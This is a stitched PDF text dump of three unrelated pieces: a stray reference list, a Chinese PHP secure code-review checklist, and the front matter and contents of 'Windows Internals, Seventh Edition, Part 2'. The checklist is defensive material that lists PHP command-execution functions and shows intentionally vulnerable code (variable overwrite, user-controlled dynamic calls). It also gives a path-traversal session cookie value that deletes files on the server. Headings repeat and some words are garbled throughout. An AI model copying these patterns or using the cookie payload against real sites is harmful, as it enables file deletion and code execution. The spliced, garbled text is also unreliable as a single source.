[ix] Great Tiger the band: http://wearegreattiger.com/ and
http://www.myspace.com/wearegreattiger
[x] YouTube copyrighted logo is a trademark of Google Inc.
[x1] Adobe’s website content:
http://www.adobe.com/devnet/flashmediaserver/articles/overview_str
eaming_fms3_02.html | pdf |
目录
目录
目录
目录
1.概述3
2.输入验证和输出显示3
2.1命令注入4
2.2跨站脚本4
2.3文件包含5
2.4代码注入5
2.5 SQL 注入6
2.6 XPath 注入6
2.7 HTTP 响应拆分6
2.8文件管理6
2.9文件上传7
2.10变量覆盖7
2.11动态函数7
3.会话安全8
3.1 HTTPOnly 设置8
3.2 domain 设置8
3.3 path 设置8
3.4 cookies 持续时间8
3.5 secure 设置8
3.6 session 固定9
3.7 CSRF 9
4.加密9
4.1明文存储密码9
4.2密码弱加密9
4.3密码存储在攻击者能访问到的文件9
5.认证和授权10
5.1用户认证10
5.2函数或文件的未认证调用10
5.3密码硬编码10
6.随机函数10
6.1 rand() 10
6.2 mt_srand()和 mt_rand() 11
7.特殊字符和多字节编码11
7.1多字节编码11
8. PHP 危险函数11
8.1缓冲区溢出11
8.2 session_destroy()删除文件漏洞12
8.3 unset()-zend_hash_del_key_or_index 漏洞12
9.信息泄露13
9.1 phpinfo 13
10. PHP 环境13
10.1 open_basedir 设置13
10.2 allow_url_fopen 设置13
10.3 allow_url_include 设置13
10.4 safe_mode_exec_dir 设置14
10.5 magic_quote_gpc 设置14
10.6 register_globals 设置14
10.7 safe_mode 设置14
10.8 session_use_trans_sid 设置14
10.9 display_errors 设置14
10.10 expose_php 设置14
概述
概述
概述
概述
代码审核,是对应用程序源代码进行系统性检查的工作。它的目的是为了找到并且修复应
用程序在开发阶段存在的一些漏洞或者程序逻辑错误,避免程序漏洞被非法利用给企业带来不必
要的风险。
代码审核不是简单的检查代码,审核代码的原因是确保代码能安全的做到对信息和资源进
行足够的保护,所以熟悉整个应用程序的业务流程对于控制潜在的风险是非常重要的。审核人员
可以使用类似下面的问题对开发者进行访谈,来收集应用程序信息。
应用程序中包含什么类型的敏感信息,应用程序怎么保护这些信息的?
应用程序是对内提供服务,还是对外?哪些人会使用,他们都是可信用户么?
应用程序部署在哪里?
应用程序对于企业的重要性?
最好的方式是做一个 checklist,让开发人员填写。Checklist 能比较直观的反映应用程序的
信息和开发人员所做的编码安全,它应该涵盖可能存在严重漏洞的模块,例如:数据验证、身份
认证、会话管理、授权、加密、错误处理、日志、安全配置、网络架构。
输入验证和输出显示
输入验证和输出显示
输入验证和输出显示
输入验证和输出显示
大多数漏洞的形成原因主要都是未对输入数据进行安全验证或对输出数据未经过安全处
理,比较严格的数据验证方式为:
对数据进行精确匹配
接受白名单的数据
拒绝黑名单的数据
对匹配黑名单的数据进行编码
在 PHP 中可由用户输入的变量列表如下:
$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
$_HTTP_COOKIE_VARS
$_HTTP_ENV_VARS
$_HTTP_GET_VARS
$_HTTP_POST_FILES
$_HTTP_POST_VARS
$_HTTP_SERVER_VARS
我们应该对这些输入变量进行检查
命令注入
命令注入
命令注入
命令注入
PHP 执行系统命令可以使用以下几个函数:system、exec、passthru、``、shell_exec、
popen、proc_open、pcntl_exec
我们通过在全部程序文件中搜索这些函数,确定函数的参数是否会因为外部提交而改变,
检查这些参数是否有经过安全处理。
防范方法:
使用自定义函数或函数库来替代外部命令的功能
使用 escapeshellarg 函数来处理命令参数
使用 safe_mode_exec_dir 指定可执行文件的路径
跨站脚本
跨站脚本
跨站脚本
跨站脚本
反射型跨站常常出现在用户提交的变量接受以后经过处理,直接输出显示给客户端;存储
型跨站常常出现在用户提交的变量接受过经过处理后,存储在数据库里,然后又从数据库中读取
到此信息输出到客户端。输出函数经常使用:echo、print、printf、vprintf、<%=$test%>
对于反射型跨站,因为是立即输出显示给客户端,所以应该在当前的 php 页面检查变量被
客户提交之后有无立即显示,在这个过程中变量是否有经过安全检查。
对于存储型跨站,检查变量在输入后入库,又输出显示的这个过程中,变量是否有经过安
全检查。
防范方法:
如果输入数据只包含字母和数字,那么任何特殊字符都应当阻止
对输入的数据经行严格匹配,比如邮件格式,用户名只包含英文或者中文、下划线、连字符
对输出进行 HTML 编码,编码规范
< <
> >
( (
) )
# #
& &
" "
' '
` %60
文件包含
文件包含
文件包含
文件包含
PHP 可能出现文件包含的函数: include、include_once 、require、require_once 、
show_source、highlight_file、readfile、file_get_contents、fopen、file
防范方法:
对输入数据进行精确匹配,比如根据变量的值确定语言 en.php、cn.php,那么这两个文件放在
同一个目录下’language/’.$_POST[‘lang’].’.php’,那么检查提交的数据是否是 en 或者 cn 是最
严格的,检查是否只包含字母也不错
通过过滤参数中的/、..等字符
代码注入
代码注入
代码注入
代码注入
PHP 可能出现代码注入的函数:eval、preg_replace+/e、assert 、call_user_func、
call_user_func_array、create_function
查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控,有无做输入验证
防范方法:
输入数据精确匹配
白名单方式过滤可执行的函数
SQL
SQL
SQL
SQL 注入
注入
注入
注入
SQL 注入因为要操作数据库,所以一般会查找SQL 语句关键字:insert、delete、update、
select,查看传递的变量参数是否用户可控制,有无做过安全处理
防范方法:
使用参数化查询
XPath
XPath
XPath
XPath 注入
注入
注入
注入
Xpath 用于操作 xml,我们通过搜索 xpath 来分析,提交给 xpath 函数的参数是否有经过安
全处理
防范方法:
对于数据进行精确匹配
HTTP
HTTP
HTTP
HTTP 响应拆分
响应拆分
响应拆分
响应拆分
PHP 中可导致 HTTP 响应拆分的情况为:使用 header 函数和使用$_SERVER 变量。注意
PHP 的高版本会禁止 HTTP 表头中出现换行字符,这类可以直接跳过本测试。
防范方法:
精确匹配输入数据
检测输入输入中如果有\r 或\n,直接拒绝
文件管理
文件管理
文件管理
文件管理
PHP 的用于文件管理的函数,如果输入变量可由用户提交,程序中也没有做数据验证,可
能成为高危漏洞。我们应该在程序中搜索如下函数:copy、rmdir、unlink、delete、fwrite、chmod、
fgetc、fgetcsv、fgets、fgetss、file、file_get_contents、fread、readfile、ftruncate、file_put_contents、
fputcsv、fputs,但通常 PHP 中每一个文件操作函数都可能是危险的。
http://ir.php.net/manual/en/ref.filesystem.php
防范方法:
对提交数据进行严格匹配
限定文件可操作的目录
文件上传
文件上传
文件上传
文件上传
PHP 文件上传通常会使用 move_uploaded_file,也可以找到文件上传的程序进行具体分析
防范方式:
使用白名单方式检测文件后缀
上传之后按时间能算法生成文件名称
上传目录脚本文件不可执行
注意%00截断
变量覆盖
变量覆盖
变量覆盖
变量覆盖
PHP 变量覆盖会出现在下面几种情况:
遍历初始化变量
例:
foreach
foreach
foreach
foreach($_GET as
as
as
as $key => $value)
$$key = $value;
函数覆盖变量:parse_str、mb_parse_str、import_request_variables
Register_globals=ON 时,GET 方式提交变量会直接覆盖
防范方法:
设置 Register_globals=OFF
不要使用这些函数来获取变量
动态函数
动态函数
动态函数
动态函数
当使用动态函数时,如果用户对变量可控,则可导致攻击者执行任意函数。
例:
<?php
$myfunc=$_GET['myfunc'];
$myfunc();
?>
防御方法:
不要这样使用函数
会话安全
会话安全
会话安全
会话安全
HTTPOnly
HTTPOnly
HTTPOnly
HTTPOnly 设置
设置
设置
设置
session.cookie_httponly = ON 时,客户端脚本(JavaScript 等)无法访问该 cookie,打开该
指令可以有效预防通过 XSS 攻击劫持会话ID
domain
domain
domain
domain 设置
设置
设置
设置
检查 session.cookie_domain 是否只包含本域,如果是父域,则其他子域能够获取本域的
cookies
path
path
path
path 设置
设置
设置
设置
检查 session.cookie_path,如果网站本身应用在/app,则 path 必须设置为/app/,才能保
证安全
cookies
cookies
cookies
cookies 持续时间
持续时间
持续时间
持续时间
检查 session.cookie_lifetime,如果时间设置过程过长,即使用户关闭浏览器,攻击者也会
危害到帐户安全
secure
secure
secure
secure 设置
设置
设置
设置
如果使用 HTTPS,那么应该设置 session.cookie_secure=ON,确保使用 HTTPS 来传输
cookies
session
session
session
session 固定
固定
固定
固定
如果当权限级别改变时(例如核实用户名和密码后,普通用户提升到管理员),我们就应该
修改即将重新生成的会话 ID,否则程序会面临会话固定攻击的风险。
CSRF
CSRF
CSRF
CSRF
跨站请求伪造攻击,是攻击者伪造一个恶意请求链接,通过各种方式让正常用户访问后,
会以用户的身份执行这些恶意的请求。我们应该对比较重要的程序模块,比如修改用户密码,添
加用户的功能进行审查,检查有无使用一次性令牌防御 csrf 攻击。
加密
加密
加密
加密
明文存储密码
明文存储密码
明文存储密码
明文存储密码
采用明文的形式存储密码会严重威胁到用户、应用程序、系统安全。
密码弱加密
密码弱加密
密码弱加密
密码弱加密
使用容易破解的加密算法,MD5加密已经部分可以利用 md5破解网站来破解
密码存储在攻击者能访问到的文件
密码存储在攻击者能访问到的文件
密码存储在攻击者能访问到的文件
密码存储在攻击者能访问到的文件
例如:保存密码在 txt、ini、conf、inc、xml 等文件中,或者直接写在 HTML 注释中
认证和授权
认证和授权
认证和授权
认证和授权
用户认证
用户认证
用户认证
用户认证
检查代码进行用户认证的位置,是否能够绕过认证,例如:登录代码可能存在表单注入。
检查登录代码有无使用验证码等,防止暴力破解的手段
函数或文件的未认证调用
函数或文件的未认证调用
函数或文件的未认证调用
函数或文件的未认证调用
一些管理页面是禁止普通用户访问的,有时开发者会忘记对这些文件进行权限验证,导致漏洞发
生
某些页面使用参数调用功能,没有经过权限验证,比如 index.php?action=upload
密码硬编码
密码硬编码
密码硬编码
密码硬编码
有的程序会把数据库链接账号和密码,直接写到数据库链接函数中。
随机函数
随机函数
随机函数
随机函数
rand()
rand()
rand()
rand()
rand()最大随机数是32767,当使用 rand 处理 session 时,攻击者很容易破解出 session,
建议使用 mt_rand()
mt_srand()
mt_srand()
mt_srand()
mt_srand()和
和
和
和 mt_rand()
mt_rand()
mt_rand()
mt_rand()
PHP4和 PHP5<5.2.6,这两个函数处理数据是不安全的。在 web 应用中很多使用 mt_rand
来处理随机的 session,比如密码找回功能等,这样的后果就是被攻击者恶意利用直接修改密码。
特殊字符和多字节编码
特殊字符和多字节编码
特殊字符和多字节编码
特殊字符和多字节编码
多字节编码
多字节编码
多字节编码
多字节编码
PHP
PHP
PHP
PHP 危险函数
危险函数
危险函数
危险函数
缓冲区溢出
缓冲区溢出
缓冲区溢出
缓冲区溢出
confirm_phpdoc_compiled
confirm_phpdoc_compiled
confirm_phpdoc_compiled
confirm_phpdoc_compiled
影响版本:
phpDocumentor phpDocumentor 1.3.1
phpDocumentor phpDocumentor 1.3 RC4
phpDocumentor phpDocumentor 1.3 RC3
phpDocumentor phpDocumentor 1.2.3
phpDocumentor phpDocumentor 1.2.2
phpDocumentor phpDocumentor 1.2.1
phpDocumentor phpDocumentor 1.2
mssql_pconnect/mssql_connect
mssql_pconnect/mssql_connect
mssql_pconnect/mssql_connect
mssql_pconnect/mssql_connect
影响版本:PHP <= 4.4.6
crack_opendict
crack_opendict
crack_opendict
crack_opendict
影响版本:PHP = 4.4.6
snmpget
snmpget
snmpget
snmpget
影响版本:PHP <= 5.2.3
ibase_connect
ibase_connect
ibase_connect
ibase_connect
影响版本:PHP = 4.4.6
unserialize
unserialize
unserialize
unserialize
影响版本:PHP 5.0.2、PHP 5.0.1、PHP 5.0.0、PHP 4.3.9、PHP 4.3.8、PHP 4.3.7、PHP
4.3.6、PHP 4.3.3、PHP 4.3.2、PHP 4.3.1、PHP 4.3.0、PHP 4.2.3、PHP 4.2.2、PHP 4.2.1、
PHP 4.2.0、PHP 4.2-dev、PHP 4.1.2、PHP 4.1.1、PHP 4.1.0、PHP 4.1、PHP 4.0.7、
PHP 4.0.6、PHP 4.0.5、PHP 4.0.4、PHP 4.0.3pl1、PHP 4.0.3、PHP 4.0.2、PHP 4.0.1pl2、
PHP 4.0.1pl1、PHP 4.0.1
session_destroy()
session_destroy()
session_destroy()
session_destroy()删除文件漏洞
删除文件漏洞
删除文件漏洞
删除文件漏洞
影响版本:不祥,需要具体测试
测试代码如下:
<?php
<?php
<?php
<?php
session_save_path
session_save_path
session_save_path
session_save_path((((‘./’););););
session_start
session_start
session_start
session_start();
();
();
();
ifififif(((($_GET[[[[‘del’])])])]) {{{{
session_unset
session_unset
session_unset
session_unset();
();
();
();
session_destroy
session_destroy
session_destroy
session_destroy();
();
();
();
}}}}else
else
else
else{{{{
$_SESSION[[[[‘do’]]]]=1;;;;
echo
echo
echo
echo((((session_id
session_id
session_id
session_id());
());
());
());
print_r
print_r
print_r
print_r(((($_SESSION););););
}}}}
?>
?>
?>
?>
当我们提交 cookie:PHPSESSIONID=/../1.php,相当于删除了此文件
unset()-zend_hash_del_key_or_index
unset()-zend_hash_del_key_or_index
unset()-zend_hash_del_key_or_index
unset()-zend_hash_del_key_or_index 漏洞
漏洞
漏洞
漏洞
zend_hash_del_key_or_index PHP4 小 于 4.4.3 和 PHP5 小 于 5.1.3 , 可 能 会 导 致
zend_hash_del 删除了错误的元素。当 PHP 的 unset()函数被调用时,它会阻止变量被 unset。
信息泄露
信息泄露
信息泄露
信息泄露
phpinfo
phpinfo
phpinfo
phpinfo
如果攻击者可以浏览到程序中调用 phpinfo 显示的环境信息,会为进一步攻击提供便利
PHP
PHP
PHP
PHP 环境
环境
环境
环境
open_basedir
open_basedir
open_basedir
open_basedir 设置
设置
设置
设置
open_basedir 能限制应用程序能访问的目录,检查有没有对 open_basedir 进行设置,当
然有的通过 web 服务器来设置,例如:apache 的 php_admin_value,nginx+fcgi 通过 conf 来
控制 php 设置
allow_url_fopen
allow_url_fopen
allow_url_fopen
allow_url_fopen 设置
设置
设置
设置
如果 allow_url_fopen=ON,那么 php 可以读取远程文件进行操作,这个容易被攻击者利用
allow_url_include
allow_url_include
allow_url_include
allow_url_include 设置
设置
设置
设置
如果 allow_url_include=ON,那么 php 可以包含远程文件,会导致严重漏洞
safe_mode_exec_dir
safe_mode_exec_dir
safe_mode_exec_dir
safe_mode_exec_dir 设置
设置
设置
设置
这个选项能控制 php 可调用的外部命令的目录,如果 PHP 程序中有调用外部命令,那么
指定外部命令的目录,能控制程序的风险
magic_quote_gpc
magic_quote_gpc
magic_quote_gpc
magic_quote_gpc 设置
设置
设置
设置
这个选项能转义提交给参数中的特殊字符,建议设置 magic_quote_gpc=ON
register_globals
register_globals
register_globals
register_globals 设置
设置
设置
设置
开启这个选项,将导致 php 对所有外部提交的变量注册为全局变量,后果相当严重
safe_mode
safe_mode
safe_mode
safe_mode 设置
设置
设置
设置
safe_mode 是 PHP 的重要安全特性,建议开启
session_use_trans_sid
session_use_trans_sid
session_use_trans_sid
session_use_trans_sid 设置
设置
设置
设置
如果启用 session.use_trans_sid,会导致 PHP 通过 URL 传递会话 ID,这样一来,攻击者
就更容易劫持当前会话,或者欺骗用户使用已被攻击者控制的现有会话。
display_errors
display_errors
display_errors
display_errors 设置
设置
设置
设置
如果启用此选项,PHP 将输出所有的错误或警告信息,攻击者能利用这些信息获取 web
根路径等敏感信息
expose_php
expose_php
expose_php
expose_php 设置
设置
设置
设置
如果启用 expose_php 选项,那么由 PHP 解释器生成的每个响应都会包含主机系统上所安
装的 PHP 版本。了解到远程服务器上运行的 PHP 版本后,攻击者就能针对系统枚举已知的盗
取手段,从而大大增加成功发动攻击的机会。
参考文档:
https://www.fortify.com/vulncat/zh_CN/vulncat/index.html
http://secinn.appspot.com/pstzine/read?issue=3&articleid=6
http://riusksk.blogbus.com/logs/51538334.html
http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project | pdf |
Windows Internals
Seventh Edition
Part 2
Andrea Allievi
Alex Ionescu
Mark E. Russinovich
David A. Solomon
Editor-in-Chief: Brett Bartow
Development Editor: Mark Renfrow
Managing Editor: Sandra Schroeder
Senior Project Editor: Tracey Croom
Executive Editor: Loretta Yates
Production Editor: Dan Foster
Copy Editor: Charlotte Kughen
Indexer: Valerie Haynes Perry
Proofreader: Dan Foster
Technical Editor: Christophe Nasarre
Editorial Assistant: Cindy Teeters
Cover Designer: Twist Creative, Seattle
Compositor: Danielle Foster
Graphics: Vived Graphics
© WINDOWS INTERNALS, SEVENTH EDITION, PART 2
Published with the authorization of Microsoft Corporation by:
Pearson Education, Inc.
Copyright © 2022 by Pearson Education, Inc.
All rights reserved. This publication is protected by copyright, and permission
must be obtained from the publisher prior to any prohibited reproduction,
storage in a retrieval system, or transmission in any form or by any means,
electronic, mechanical, photocopying, recording, or likewise. For information
regarding permissions, request forms, and the appropriate contacts within
the Pearson Education Global Rights & Permissions Department, please visit
www.pearson.com/permissions.
No patent liability is assumed with respect to the use of the information con-
tained herein. Although every precaution has been taken in the preparation
of this book, the publisher and author assume no responsibility for errors or
omissions. Nor is any liability assumed for damages resulting from the use of
the information contained herein.
ISBN-13: 978-0-13-546240-9
ISBN-10: 0-13-546240-1
Library of Congress Control Number: 2021939878
ScoutAutomatedPrintCode
TRADEMARKS
Microsoft and the trademarks listed at http://www.microsoft.com on the
“Trademarks” webpage are trademarks of the Microsoft group of companies.
All other marks are property of their respective owners.
WARNING AND DISCLAIMER
Every effort has been made to make this book as complete and as accurate
on an “as is” basis. The author, the publisher, and Microsoft Corporation shall
have neither liability nor responsibility to any person or entity with respect to
any loss or damages arising from the information contained in this book or
from the use of the programs accompanying it.
SPECIAL SALES
For information about buying this title in bulk quantities, or for special sales
opportunities (which may include electronic versions; custom cover designs;
and content particular to your business, training goals, marketing focus, or
branding interests), please contact our corporate sales department at corp-
[email protected] or (800) 382-3419.
For government sales inquiries,
please contact [email protected].
For questions about sales outside the U.S.,
please contact [email protected].
To my parents, Gabriella and Danilo, and to my brother,
Luca, who all always believed in me and pushed me in following
my dreams.
—ANDREA ALLIEVI
To my wife and daughter, who never give up on me and are a
constant source of love and warmth. To my parents, for inspiring
me to chase my dreams and making the sacrifices that gave me
opportunities.
—ALEX IONESCU
Contents at a Glance
About the Authors
xviii
Foreword
xx
Introduction
xxiii
CHAPTER 8
System mechanisms
1
CHAPTER 9
Virtualization technologies
267
CHAPTER 10
Management, diagnostics, and tracing
391
CHAPTER 11
aching and file sstems
CHAPTER 12
Startup and shutdown
777
Contents of Windows Internals, Seventh Edition, Part 1
851
Index
861
vii
Contents
About the Authors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xviii
Foreword . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .xx
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiii
Chapter 8
System mechanisms
1
Processor execution model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Task state segments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Hardware side-channel vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Out-of-order execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
The CPU branch predictor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11
The CPU cache(s) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Side-channel attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Side-channel mitigations in Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
KVA Shadow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Hardware indirect branch controls (IBRS, IBPB, STIBP, SSBD) . . . . . . . 21
Retpoline and import optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23
STIBP pairing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26
Trap dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Interrupt dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32
Line-based versus message signaled–based interrupts . . . . . . . . . . .50
Timer processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .66
System worker threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Exception dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .85
System service handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
WoW64 (Windows-on-Windows). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .104
The WoW64 core . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
File system redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Registry redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
X86 simulation on AMD64 platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . .111
ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
viii
Contents
Memory models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
ARM32 simulation on ARM64 platforms . . . . . . . . . . . . . . . . . . . . . . . . 115
X86 simulation on ARM64 platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Object Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Executive objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Object structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
High-IRQL synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Low-IRQL synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Advanced local procedure call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .209
Connection model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Message model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Asynchronous operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Views, regions, and sections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
Attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
Blobs, handles, and resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Handle passing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .220
Power management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221
ALPC direct event attribute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .222
Debugging and tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .222
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .224
WNF features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .225
WNF users . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .226
WNF state names and storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .233
WNF event aggregation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .237
User-mode debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .239
Kernel support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .239
Native support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .240
Windows subsystem support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .242
Packaged applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .243
UWP applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .245
Centennial applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .246
Contents
ix
The Host Activity Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .249
The State Repository . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251
The Dependency Mini Repository . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .255
Background tasks and the Broker Infrastructure . . . . . . . . . . . . . . . . .256
Packaged applications setup and startup . . . . . . . . . . . . . . . . . . . . . . .258
Package activation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .259
Package registration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .265
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .266
Chapter 9
Virtualization technologies
267
The Windows hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .267
Partitions, processes, and threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .269
The hypervisor startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .274
The hypervisor memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .279
Hyper-V schedulers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .287
Hypercalls and the hypervisor TLFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . .299
Intercepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .300
The synthetic interrupt controller (SynIC) . . . . . . . . . . . . . . . . . . . . . . . 301
The Windows hypervisor platform API and EXO partitions . . . . . . .304
Nested virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .307
The Windows hypervisor on ARM64 . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
The virtualization stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Virtual machine manager service and worker processes . . . . . . . . . 315
The VID driver and the virtualization stack memory manager . . . . 317
The birth of a Virtual Machine (VM) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
VMBus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .323
Virtual hardware support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .329
VA-backed virtual machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .336
Virtualization-based security (VBS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .340
Virtual trust levels (VTLs) and Virtual Secure Mode (VSM) . . . . . . . .340
Services provided by the VSM and requirements . . . . . . . . . . . . . . . .342
The Secure Kernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .345
Virtual interrupts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .345
Secure intercepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .348
x
Contents
VSM system calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .349
Secure threads and scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .356
The Hypervisor Enforced Code Integrity . . . . . . . . . . . . . . . . . . . . . . . .358
UEFI runtime virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .358
VSM startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .360
The Secure Kernel memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . .363
Hot patching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .368
Isolated User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Trustlets creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .372
Secure devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .376
VBS-based enclaves . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .378
System Guard runtime attestation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .386
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .390
Chapter 10 Management, diagnostics, and tracing
391
The registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Viewing and changing the registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Registry usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .392
Registry data types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .393
Registry logical structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .394
